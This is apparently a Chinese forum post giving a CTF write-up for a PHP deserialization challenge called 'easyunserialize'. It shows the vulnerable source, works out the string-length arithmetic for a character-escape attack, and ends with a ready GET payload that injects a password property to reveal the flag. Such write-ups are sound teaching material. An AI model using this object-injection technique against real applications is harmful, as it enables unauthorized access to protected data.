CTF-37解题思路

Track-子羽   ·   发表于 2021-11-22 17:38:03   ·   CTF&WP专版

源码分析

  1. <h3>easyunserialize<h3/>
  2. <?php
  3. error_reporting(0);
  4. highlight_file(__FILE__);
  5. class a
  6. {
  7. public $uname;
  8. public $password;
  9. public function __construct($uname,$password)
  10. {
  11. $this->uname=$uname;
  12. $this->password=$password;
  13. }
  14. public function __wakeup()
  15. {
  16. if($this->password==='easy')
  17. {
  18. include('flag.php');
  19. echo $flag;
  20. }
  21. else
  22. {
  23. echo 'wrong password';
  24. }
  25. }
  26. }
  27. function filter($string){
  28. return str_replace('challenge','easychallenge',$string);
  29. }
  30. $uname=$_GET[1];
  31. $password=1;
  32. $ser=filter(serialize(new a($uname,$password)));
  33. $test=unserialize($ser);
  34. ?>

反序列化字符逃逸 正常序列化

脚本:

  1. <?php
  2. error_reporting(0);
  3. class a
  4. {
  5. public $uname;
  6. public $password;
  7. public function __construct()
  8. {
  9. $this->uname='admin';
  10. $this->password=1;
  11. }
  12. }
  13. function filter($string){
  14. return str_replace('challenge','easychallenge',$string);
  15. }
  16. $ser=serialize(new a());
  17. echo $ser;
  18. //运行结果
  19. // O:1:"a":2:{s:5:"uname";s:5:"admin";s:8:"password";i:1;}

需要添加的字符串 长度29
";s:8:"password";s:4:"easy";}

替换后会由9变成13 长度变长4 列方程
9m + 29 = 13m

除不尽 尝试增加需要添加的字符串的长度
";s:8:"password";s:4:"easy";}aaa

此时 m= 8 即增加8个challenge

payload:

  1. ?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}aaa

打赏我,让我更有动力~

0 Reply   |  Until 17天前 | 85 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2021 掌控者 All Rights Reserved.